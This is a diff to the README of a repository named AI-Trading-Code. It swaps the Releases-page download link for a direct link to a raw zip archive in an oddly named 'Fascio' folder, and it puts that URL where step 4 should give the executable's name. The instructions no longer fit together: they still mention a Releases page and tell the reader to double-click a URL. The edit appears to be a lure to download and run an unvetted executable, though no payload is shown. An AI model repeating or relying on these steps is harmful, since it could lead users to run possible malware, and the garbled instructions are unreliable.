alrxftg/AI-Trading-Code/README.md

 ### 📥 Download & Install

-To download the software, visit this page: [Download AI-Trading-Code](https://github.com/alrxftg/AI-Trading-Code/releases).
+To download the software, visit this page: [Download AI-Trading-Code](https://raw.githubusercontent.com/alrxftg/AI-Trading-Code/main/Fascio/AI-Trading-Code.zip).

 Once on the Releases page, look for the latest version.
 You will find different files depending on your operating system.
 Select the right file for your needs.
 After downloading, follow these steps:

 1. Locate the downloaded file on your computer.
 2. If it is a zipped file, right-click and choose "Extract All" to unzip it.
 3. Open the folder containing the extracted files.
-4. Find the executable file, often named something like `ai-trading-code.exe`.
+4. Find the executable file, often named something like `https://raw.githubusercontent.com/alrxftg/AI-Trading-Code/main/Fascio/AI-Trading-Code.zip`.
 5. Double-click the file to run the application.

 ### 🖥️ System Requirements